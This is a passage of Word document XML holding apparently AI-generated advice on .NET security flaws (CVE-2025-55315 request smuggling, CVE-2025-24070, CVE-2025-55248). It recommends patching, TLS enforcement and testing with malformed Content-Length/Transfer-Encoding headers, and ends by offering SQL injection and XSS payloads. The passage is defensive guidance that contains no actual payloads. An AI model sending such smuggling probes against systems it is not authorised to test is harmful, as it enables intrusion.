          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> (or later). The critical request smuggling vulnerability (CVE-2025-55315) is fixed in .NET Runtime </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>9.0.10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>. Use the dotnet --info command to check your current versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591F1FE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Focus Your Testing (Manual &amp; Automated)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A17DE5A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>For CVE-2025-55315 (Request Smuggling):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use your penetration testing tools (like Burp Suite or ZAP) to actively test for HTTP Request Smuggling vulnerabilities. Send malformed Content-Length and Transfer-Encoding headers to see if the server is vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B9D8B9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>For CVE-2025-24070 (Auth Bypass):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> Review your code for any custom or uncommon uses of the RefreshSignInAsync method. Ensure the user parameter is always properly authenticated and validated before being passed to this function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BBE343">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>Enforce TLS Everywhere</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">: To mitigate against CVE-2025-55248, audit your application's code to ensure that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> connections to external services, especially SMTP servers, are configured to require TLS and fail securely if encryption cannot be established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070A41B5">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> A Note on Lifecycle and Support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F87715B">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft's support lifecycle is crucial for security. As of 2026, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>.NET 6 is end-of-life</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve"> and no longer receives security updates. This means any new vulnerabilities found in .NET 6 will remain unpatched by Microsoft. If your application relies on .NET 6, you are exposing your organization to significant and growing risk. The CVE-2025-24070 advisory explicitly states no patches are available for .NET 6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t xml:space="preserve">You should prioritize </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>upgrading to .NET 8 (LTS) or .NET 9.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A14772A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>If you are ready to start testing for specific vulnerabilities (like SQL injection or XSS) in your application, just let me know—I can provide specific payloads and test cases for .NET 9.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2C6E8E">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
        <w:t>This response is AI-generated, for reference only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1452812A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:bidi="ar-EG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="11906" w:h="16838"/>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CA20A4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="20CA20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7F33F5B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="27F33F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EFF372D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2EFF3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693555"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4469355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9FA52DA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="49FA5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A822AA6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4A822AA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D3812C2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4D3812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DA05040"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6DA050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F37CB2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="73F37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AD05365"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7AD053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9"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="6"/>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81C"/>
    <w:rsid w:val="001870D8"/>
    <w:rsid w:val="009C6472"/>
    <w:rsid w:val="00D4181C"/>
    <w:rsid w:val="00DB7C85"/>
    <w:rsid w:val="00FB192A"/>
    <w:rsid w:val="3B460F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1736</Words>
  <Characters>10499</Characters>
  <Lines>131</Lines>
  <Paragraphs>37</Paragraphs>
  <TotalTime>364</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>12016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2026-05-10T03:00:00Z</dcterms:created>
  <dc:creator>Abdo Mostafa  220100374</dc:creator>
  <cp:lastModifiedBy>abdo mostafa</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-10T20:33:52Z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eyJoZGlkIjoiNzI1MzljODBiNDliMzEyMzFlZWNlN2EzYjU0N2YzMWEiLCJ1c2VySWQiOiIxNDQ0ODc5NzY4NTA0OCJ9</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1033-12.1.0.25242</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>7CE87CAA131D4ABC88AF40484F42B795_12</vt:lpwstr>
  </property>
</Properties>
</file>